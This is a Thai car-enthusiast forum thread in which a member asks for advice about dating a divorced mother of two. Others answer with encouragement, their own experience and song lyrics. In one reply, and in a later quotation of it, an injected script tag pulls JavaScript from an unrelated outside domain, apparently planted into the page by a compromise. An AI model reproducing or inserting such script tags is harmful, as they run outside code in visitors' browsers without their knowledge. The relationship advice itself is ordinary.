ตอบ
abzabteam

ชื่อเล่น: มีมี่ซัง

เข้าร่วม: 20 ธันวา 2012
ตอบ: 179

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 232
ให้คำขอบคุณ: 29

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 23 มิถุนา 2013 11:48 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
พอดีว่า เมื่อช่วงที่ผ่านมา มีแม่หม้ายลูก2มาติดครับ ผมว่าเขาก็นิสัยดีน่ะครับ แต่ผมเองก็ยังไม่ชัวว่าเขาจะดีได้ตลอด อันที่จริงผมไม่รู้เลยด้วยซ้ำว่าเขาเลิกรากับสามีเก่าทำไม ผมเองก็ไม่เคยถามเธอ เพราะผมก็ไม่อยากไปย้ำให้เธอคิดมากหรือเสียใจ แต่ ในความคิดของผู้ชายอายุ 27 ทำงานหาเลี้ยงตัวเองมาตลอด จนซื้อ ES ได้และอีกหลายๆอย่างรับผิดชอบชีวิตตัวเองได้ ในความคิดของผมก็คือ การได้เจอผู้หญิงโสดๆสักคนเพื่อเริ่มต้นอนาคตด้วยกัน เรื่องคบแม่หม้ายไม่เคยอยู่ในหัวผมเลย แต่ตอนนี้เธอคนนี้ทำให้ผมเริ่มมีความคิดว่า มันคงไม่ผิดอะไรที่จะคบกับเธอ เพราะมันคงไม่มีรูปแบบที่แน่นอนของความรักที่เกิดกับคนสองคน ผมแค่อยากรู้ว่าเราความจะทำอย่างไร และปฏิบัติอย่างไร หากเกิดว่าผมจะตกลงปลงใจกับเธอคนนี้ครับ  แหม่!! เขียนซะยาวเชียวว  
Arthur4344

ชื่อเล่น: อีอด อ๊อด

เข้าร่วม: 30 เมษา 2012
ตอบ: 1667

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3337
ให้คำขอบคุณ: 1040

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อาทิตย์, 23 มิถุนา 2013 11:59 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ไม่ผิดหรอกครับ คนเราคบกันที่ความดี อดีตไม่สำคัญ แต่คุณต้องถามตัวเองว่า รับผิดชอบครอบครัวใหม่ไหวหรือป่าว (4 คน)
สั้นๆง่ายๆ คนยิ่งเยอะ เรื่องยิ่งเยอะ ให้ข้อคิดแค่นี้ครับ

แก้ไขล่าสุดโดย เมื่อ อาทิตย์, 23 มิถุนา 2013 13:12, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: abzabteam  tochi229  converse  davidian  raksapol  bangnum  surasak_3cha  taguunzae  Memory11 
abzabteam

อาทิตย์, 23 มิถุนา 2013 12:15 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
Arthur4344 พิมพ์ว่า:
ไม่ผิดหรอกครับ คนเราคบกันที่ความดี อดีตไม่สำคัญ แต่คุณต้องถามตัวเองว่า รับผิดชอบไหวครอบครัวใหม่หรือป่าว (4 คน)
สั้นๆง่ายๆ คนยิ่งเยอะ เรื่องยิ่งเยอะ ให้ข้อคิดแค่นี้ครับ

ขอบคุณครับ ท่านนี้ก็มีเหตุผลครับ น่าเก็บไปคิด ?!?!?! 
ได้รับคำขอบคุณจาก: tochi229  davidian 
Aclub

ชื่อเล่น: เอ

เข้าร่วม: 28 มีนา 2013
ตอบ: 155

ได้รับคำขอบคุณ: 141
ให้คำขอบคุณ: 31

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 23 มิถุนา 2013 13:06 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
เอาใจช่วยครับ

สังคมชอบตัดสินเรา
แต่แท้จริงแล้ว อยู่ที่คนสองคนนั้นแหละครับ
ความสุข ไม่มีรูปแบบอย่างที่คุณว่านั้นแหละ

สุดท้ายก็เหลือเลือกสังคม หรือตัวคุณเอง

เป็นกำลังใจให้ครับ ผมคร้ายๆกับเคยผ่านข้อนี้มา  
ได้รับคำขอบคุณจาก: abzabteam  tochi229 
abzabteam

อาทิตย์, 23 มิถุนา 2013 13:19 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
Aclub พิมพ์ว่า:
เอาใจช่วยครับ

สังคมชอบตัดสินเรา
แต่แท้จริงแล้ว อยู่ที่คนสองคนนั้นแหละครับ
ความสุข ไม่มีรูปแบบอย่างที่คุณว่านั้นแหละ

สุดท้ายก็เหลือเลือกสังคม หรือตัวคุณเอง

เป็นกำลังใจให้ครับ ผมคร้ายๆกับเคยผ่านข้อนี้มา  

ขอบคุณครับ ที่ให้กำลังใจ ผมก็ไม่ได้คิดครับ ว่าเธอผิดที่เป็นแม่หม้าย ผมแค่ทำตัวไม่ถูกครับ แต่เธอเป็นคนดี ข้อนี้ทำให้ผม เกิดความคิดว่าอยากคบกับเธอขึ้นมาครับ แต่แค่ไม่มีประสบการณ์เท่านั้นเองครับ แฮ๊ะๆ
ได้รับคำขอบคุณจาก: tochi229  davidian 
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

อาทิตย์, 23 มิถุนา 2013 13:49 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
อย่าได้แคร์

อยาก รัก แม่ ม่าย อยากปลอบใจคนดี กี่เดือนกี่ปี ดูสวยโสภีไม่สร่าง จะดูเอวองค์ อนงค์ งามจริง งามพร้อมเสียยิ่ง ทุกอย่าง ริมฝีปาก บางบาง น่ารักเสียจัง แม่ม่าย

อยาก รักแม่ม่าย อยากจะได้ เชยชม อยากจะดอมดม กอดรัดเอวกลมไม่หน่าย ไม่รังเกียจเลยเรื่องเคยผ่านมา ให้สัญญาก็ได้ ถึงมีลูกติด ไม่ผิดตรงไหน ขอรักแม่ม่าย ดี กว่า

ม่ายซิวิเศษนัก เรื่องรัก ตามตำรา ขอรักสมัครใจ แม่ม่ายจงเมตตา ใครประณามต่ำช้า ก็ยังศรัทธา แม่ม่าย ดนตรี อยาก รักแม่ม่าย ถึงจะต่างวัยเดือนปี จวบจนชีพนี้ ขอพร้อมยอมพลีมอบใจ จะมีจะจนจะทนทำกิน ขอยุพิน อย่าหน่าย รักจริงใจแน่ ไม่แชเหลวไหล เชื่อนะแม่ม่าย คน งาม ม่ายซิวิเศษนัก เรื่องรักตามตำรา ขอรักสมัครใจ แม่ม่ายจงเมตตา ใครประณามต่ำช้า ก็ยังศรัทธา แม่ม่าย

อยาก รักแม่ม่าย ถึงจะต่างวัยเดือนปี จวบจนชีพนี้ ขอพร้อมยอมพลีมอบใจ จะมี จะจน จะทนทำกิน ขอยุพิน อย่าหน่าย รักจริงใจแน่ไม่แชเหลวไหล เชื่อนะแม่ม่ายคนงาม...
ได้รับคำขอบคุณจาก: davidian  สมชาย  Nine_Eleven  fasang.Mr  movingtown  tokykung  Pha_Daeng  Pink  pamannumber1  napoon  scanclub  Rachen  LnwwasaD  taguunzae  future 
davidian

ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 23 มิถุนา 2013 14:29 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ทำตามหัวใจครับ อย่าได้แคร์
netgame02

ชื่อเล่น: ตอง

เข้าร่วม: 24 กรกฎา 2012
ตอบ: 1689

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 878
ให้คำขอบคุณ: 601

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 23 มิถุนา 2013 14:42 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ตามใจเลยคับ แต่ว่าคิดเยอะๆหน่อยก็ดีนิ
Memory11

ชื่อเล่น: หนึ่ง

เข้าร่วม: 06 พฤษภาคม 2013
ตอบ: 1892

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1457
ให้คำขอบคุณ: 2074

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 23 มิถุนา 2013 15:05 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
คบกันแล้วเรามีความสุขก็.....ยาวไปๆ^^
หนับหนุนๆ
ได้รับคำขอบคุณจาก: Nine_Eleven 
สมชาย

เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

สี: แดง รอยัล รูบี้ (มุก) (R-522P)
อาทิตย์, 23 มิถุนา 2013 15:09 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
แม่ฮ้างมหาเสหน์เท่กว่าสาวๆนักเรียน  ม.
raksapol

ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 23 มิถุนา 2013 15:19 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ทำตามใจเราเลยครับ ใจเราคิดอยากทำสิ่งใดก็ทำไปเลยครับ โดยที่ไม่เดืดอร้อนครัย ใครจะว่ายังไงก็เรื่องของเค้า เราทำแล้วมีความสุข ก็พอแล้ว เมื่อผมจะซื้อ ES แต่เพื่อนบอกว่า เอารุ่นนู่ รุ่นนี้ ดีกว่าสวยกว่า แต่ผมไม่ฟังไม่เอา ผมจะเอา Es แค่นั้นจบครับบ
ได้รับคำขอบคุณจาก: Nine_Eleven 
Nine_Eleven

ชื่อเล่น: นิ

เข้าร่วม: 28 ตุลา 2008
ตอบ: 1121

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 635
ให้คำขอบคุณ: 1154

สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 23 มิถุนา 2013 16:02 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
คำว่า ความรัก ก้าวผ่านได้หมดละครับ
ขอแค่ เข้าใจ จริงใจ อภัย
ได้รับคำขอบคุณจาก: Pink 
kobkobok

ชื่อเล่น: กบ

เข้าร่วม: 09 กุมภา 2010
ตอบ: 3919

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1738
ให้คำขอบคุณ: 290

อาทิตย์, 23 มิถุนา 2013 16:04 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
เป็นตัวของเราเองให้มากที่สุด ดูแลความรักที่มีให้ดีที่สุด เอาใจช่วยครับ
fasang.Mr

ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

อาทิตย์, 23 มิถุนา 2013 20:33 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
tochi229 พิมพ์ว่า:
อย่าได้แคร์

อยาก รัก แม่ ม่าย อยากปลอบใจคนดี กี่เดือนกี่ปี ดูสวยโสภีไม่สร่าง จะดูเอวองค์ อนงค์ งามจริง งามพร้อมเสียยิ่ง ทุกอย่าง ริมฝีปาก บางบาง น่ารักเสียจัง แม่ม่าย

อยาก รักแม่ม่าย อยากจะได้ เชยชม อยากจะดอมดม กอดรัดเอวกลมไม่หน่าย ไม่รังเกียจเลยเรื่องเคยผ่านมา ให้สัญญาก็ได้ ถึงมีลูกติด ไม่ผิดตรงไหน ขอรักแม่ม่าย ดี กว่า

ม่ายซิวิเศษนัก เรื่องรัก ตามตำรา ขอรักสมัครใจ แม่ม่ายจงเมตตา ใครประณามต่ำช้า ก็ยังศรัทธา แม่ม่าย ดนตรี อยาก รักแม่ม่าย ถึงจะต่างวัยเดือนปี จวบจนชีพนี้ ขอพร้อมยอมพลีมอบใจ จะมีจะจนจะทนทำกิน ขอยุพิน อย่าหน่าย รักจริงใจแน่ ไม่แชเหลวไหล เชื่อนะแม่ม่าย คน งาม ม่ายซิวิเศษนัก เรื่องรักตามตำรา ขอรักสมัครใจ แม่ม่ายจงเมตตา ใครประณามต่ำช้า ก็ยังศรัทธา แม่ม่าย

อยาก รักแม่ม่าย ถึงจะต่างวัยเดือนปี จวบจนชีพนี้ ขอพร้อมยอมพลีมอบใจ จะมี จะจน จะทนทำกิน ขอยุพิน อย่าหน่าย รักจริงใจแน่ไม่แชเหลวไหล เชื่อนะแม่ม่ายคนงาม...

เพลงประจำตัวเหรอคุณปี๊บ คล่องเชียว
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: tochi229 
thanatphong

เข้าร่วม: 05 มิถุนา 2009
ตอบ: 2693

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5343
ให้คำขอบคุณ: 20

อาทิตย์, 23 มิถุนา 2013 20:40 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
fasang.Mr พิมพ์ว่า:
อย่าได้แคร์

เพลงประจำตัวเหรอคุณปี๊บ คล่องเชียว
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

ได้รับคำขอบคุณจาก: tochi229  Cool_M 
nattawoot

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 30 สิงหา 2012
ตอบ: 268

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 67
ให้คำขอบคุณ: 336

สี: น้ำเงิน วิวิด (มุก) (B-502P)
อาทิตย์, 23 มิถุนา 2013 20:46 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ไม่เป็นไรหรอกคับเราก็ไม่ต้องไปสนใจอดีตแค่ปัจจุบันคบกันมีความสุขเข้าใจกันและกันก็okคับคิดถึงอนาคตดีกว่าผมก็มีแฟนเปนแม่หม้ายเหมือนกันคับ
ได้รับคำขอบคุณจาก: abzabteam 
nongnirvana

ชื่อเล่น: โค๊ก

เข้าร่วม: 13 กันยา 2011
ตอบ: 702

Guru ES
Guru ES

ได้รับคำขอบคุณ: 165
ให้คำขอบคุณ: 375

สี: แดง แรลไล (R-513)
อาทิตย์, 23 มิถุนา 2013 22:16 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ทำแล้วมีความสุข ทำเลยครับ

สนับสนุน 
thammarong007

ชื่อเล่น: รงค์

เข้าร่วม: 23 ธันวา 2012
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2672
ให้คำขอบคุณ: 3437

สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 23 มิถุนา 2013 22:29 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ผมก็มีภรรยาเป็นแม่หม้ายแก่กว่าผม 5 ปี มีลูก 2 คน แต่ลูกเค้าอยู่กับสามีเก่า อยู่ด้วยกันกับผมจนปีนี้จะเข้าปีที่ 11 แล้ว ผมว่ามันอยู่ที่คนสองคนจริงๆครับ ว่าพร้อมที่จะเริ่มต้นและไปด้วยกันมั้ย แต่คุณจะต้องรับได้นะครับ ถ้าอีกหน่อยอาจจะต้องช่วยส่งเสีย เลี้ยงดู ลูกเค้าบ้างเป็นบางครั้งบางคราว และต้องเอ็นดูลูกเค้าเหมือนลูกเหมือนหลานเราด้วยนะครับ ถ้าคุณรับได้แค่นี้ก็ผ่านแล้วครับ
ได้รับคำขอบคุณจาก: Ton-  wut-chiangmai  abzabteam  Pink  future 
koobe

ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 23 มิถุนา 2013 22:56 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
สังคมคนไทย ถ้าผู้หญิงที่แต่งงานแล้ว และ หรือ มีลูกติด แล้วเป็นหม้าย ถ้าจะแต่งงานหรือมีคู่ครองใหม่ ในสายตาคนทั่วๆไปที่(ใจแคบ)จะมองว่าเป็นความผิด ไม่น่าคบ ผ่านผู้ชายมาแล้ว กร้านชีวิต  เดี๋ยวชีวิตคู่ก็ล้มเหลว ....
   แต่ถ้าเป็นผู้ชาย หากเคยแต่งงาน มีเมียมีลูกมาแล้ว ถึงจะแต่งงาน อีกกี่ครั้งก็ไม่ผิด ถือว่าเก่ง เทห์  เป็นผู้มีประสบการณ์ ประสบความสำเร็จเรื่องชีวิต  ยิ่งมีเมียมามากยิ่งเก่ง ไม่ผิดศีลธรรม.....

ทำไมใจแคบผมกับเห็นว่าจะหม้ายไม่หม้ายมันก็ไม่เกียว ดีซะอีกผู้หญิงที่ได้ผ่านเรื่องอะไรที่ร้ายๆมาบ้างจะได้เข้าใจชีวิตและจะไม่ยอมให้เรื่องแบบในอดีตมันเกิดขึ้นอีก มันเป็นเรื่องความเข้าใจกันของคนสองคน ถ้าอยู่กันแล้วมีความสุขก็ทำเถอะครับ  ญาติพี่น้องสังคมคนรอบข้างถ้าเขาใจแคบก็ปล่อยเขาคิดไป จะสุขจะทุกข์มันอยู่ที่เราทำ....

ได้รับคำขอบคุณจาก: thammarong007  CHAMPnaja  abzabteam  Pink  LnwwasaD  taguunzae  future 
LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

จันทร์, 24 มิถุนา 2013 01:52 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ถ้าคุณรับสภาพที่เค้าเป็นอยู่ และ ยอมรับกับสิ่งที่เขามีติดมาด้วยได้ อยู่กับเค้าแล้วมีความสุข เข้าใจกัน... คนที่จะมีความสุขที่สุด ไม่ใช่คนอื่น ไม่ใช่พวกปากหอย ปากปู แต่.... คือตัวคุณเอง ครับ
ได้รับคำขอบคุณจาก: wut-chiangmai  abzabteam  LnwwasaD 
sukhothai

เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
จันทร์, 24 มิถุนา 2013 08:03 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
อย่าได้แคร์

เล่นซะจบเพลงเลยพี่ปี๊ป กะไม่ให้ใครร้องต่อเลยอะ

ตามข้างบนทุกเหตุผลเลยครับ เอามารวมๆกันแล้วคิดหลายๆเหตุผลครับ

ผมมีความเชื่ออยู่อย่างว่าผู้หญิงส่วนใหญ่ไม่อยากมีสามีหลายคน และ

ผู้หญิงที่เป็นแม่ม่ายเขาจะใช้ชีวิตอย่างระวังมากขึ้นในทุกๆด้าน เพราะฉะนั้น

ก็ต้องดูว่าที่เขาเลิกกับคนเก่ามาด้วยเรื่องอะไร จะเป็นสิ่งที่เขาระวังมากที่สุด

มันอาจจะเป็นเรื่องที่เขาเก็บมาระแวงเราได้ แม้ว่าเราไม่ได้ทำสื่ิ่งนั้น เป็นกำลังใจให้ครับ
Pha_Daeng

ชื่อเล่น: อ้น

เข้าร่วม: 07 ธันวา 2012
ตอบ: 500

ได้รับคำขอบคุณ: 377
ให้คำขอบคุณ: 380

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 24 มิถุนา 2013 08:26 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ขอแสดงความยินดี และขอให้สมหวังกับรักครั้งนี้นะครับ
LnwwasaD

ชื่อเล่น: เฟริท

เข้าร่วม: 10 เมษา 2012
ตอบ: 3543

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2843
ให้คำขอบคุณ: 2957

จันทร์, 24 มิถุนา 2013 08:34 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ใจเป็นนาย   กายเป็นบ่าว ครับท่าน  .......  

ทำตามที่
หัวใจเราเรียกร้องครับ  ..............
ได้รับคำขอบคุณจาก: abzabteam  taguunzae 
Cool_M

ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

จันทร์, 24 มิถุนา 2013 08:34 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
อย่าได้แคร์

โอ๊ะพี่ปิ๊ป
Cool_M

ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

จันทร์, 24 มิถุนา 2013 08:36 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ยังไงเรื่องก็อยู่ที่คนสองคนแหละครับ คบกันแล้วมีความสุข อย่าได้แคร์สื่อไม่มีใครช่วยเหลือเราได้ทุกเรื่องหรอกครับ มีแค่คนสองคนเท่าทั้นที่จะต้องช่วยกันประคองชีวิตต่อไป สู้ๆครับ
bas_es

เข้าร่วม: 02 ตุลา 2008
ตอบ: 138

ได้รับคำขอบคุณ: 90
ให้คำขอบคุณ: 154

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 24 มิถุนา 2013 08:50 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
ความสุขอยู่ที่ตัวคุณครับ เพราะมันอยู่ที่คน 2 คน ถ้าคุณคบกับเค้าแล้วมีความสุข และคุณไม่ได้เดือนร้อนอะไร กับภาระที่จะเพิ่มขึ้น 
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

จันทร์, 24 มิถุนา 2013 09:13 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
Cool_M พิมพ์ว่า:
อย่าได้แคร์

โอ๊ะพี่ปิ๊ป

เนื้อเพลง มันมีคำตอบของทุก ๆ ท่านแฝงอยู่แล้วนะครับ  !!

ม่ายซิวิเศษนัก เรื่องรัก ตามตำรา ขอรักสมัครใจ แม่ม่ายจงเมตตา ใครประณามต่ำช้า ก็ยังศรัทธา แม่ม่าย 

อยาก รักแม่ม่าย ถึงจะต่างวัยเดือนปี จวบจนชีพนี้ ขอพร้อมยอมพลีมอบใจ จะมีจะจนจะทนทำกิน ขอยุพิน อย่าหน่าย รักจริงใจแน่ ไม่แชเหลวไหล เชื่อนะแม่ม่าย คน งาม

ม่ายซิวิเศษนัก เรื่องรักตามตำรา ขอรักสมัครใจ แม่ม่ายจงเมตตา ใครประณามต่ำช้า ก็ยังศรัทธา แม่ม่าย

อยาก รักแม่ม่าย ถึงจะต่างวัยเดือนปี จวบจนชีพนี้ ขอพร้อมยอมพลีมอบใจ จะมี จะจน จะทนทำกิน ขอยุพิน อย่าหน่าย รักจริงใจแน่ไม่แชเหลวไหล เชื่อนะแม่ม่ายคนงาม..

abzabteam

จันทร์, 24 มิถุนา 2013 10:01 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
nattawoot พิมพ์ว่า:
ไม่เป็นไรหรอกคับเราก็ไม่ต้องไปสนใจอดีตแค่ปัจจุบันคบกันมีความสุขเข้าใจกันและกันก็okคับคิดถึงอนาคตดีกว่าผมก็มีแฟนเปนแม่หม้ายเหมือนกันคับ

โอ๊ะโอ ครับขอบคุณมากครับผม 
abzabteam

จันทร์, 24 มิถุนา 2013 10:02 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
thammarong007 พิมพ์ว่า:
ผมก็มีภรรยาเป็นแม่หม้ายแก่กว่าผม 5 ปี มีลูก 2 คน แต่ลูกเค้าอยู่กับสามีเก่า อยู่ด้วยกันกับผมจนปีนี้จะเข้าปีที่ 11 แล้ว ผมว่ามันอยู่ที่คนสองคนจริงๆครับ ว่าพร้อมที่จะเริ่มต้นและไปด้วยกันมั้ย แต่คุณจะต้องรับได้นะครับ ถ้าอีกหน่อยอาจจะต้องช่วยส่งเสีย เลี้ยงดู ลูกเค้าบ้างเป็นบางครั้งบางคราว และต้องเอ็นดูลูกเค้าเหมือนลูกเหมือนหลานเราด้วยนะครับ ถ้าคุณรับได้แค่นี้ก็ผ่านแล้วครับ

ครับ ขอบคุณครับ ผมคิดว่าผมน่าจะทำได้ครับ 
abzabteam

จันทร์, 24 มิถุนา 2013 10:04 - ไม่เกี่ยวก่ะเรื่อง ES น่ะครับ อยากถามว่าเพื่อนๆคนไหนมีแฟนเป็นแม่หม้าย บ้างครับ
LnwwasaD พิมพ์ว่า:
ใจเป็นนาย   กายเป็นบ่าว ครับท่าน  .......  

ทำตามที่
หัวใจเราเรียกร้องครับ  ..............

แหม่ ไบรอั่น โอคอนเนอร์ มาตอบทีเดียวเชียว ฮิฮิ ขอบคุณครับ
ได้รับคำขอบคุณจาก: LnwwasaD 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.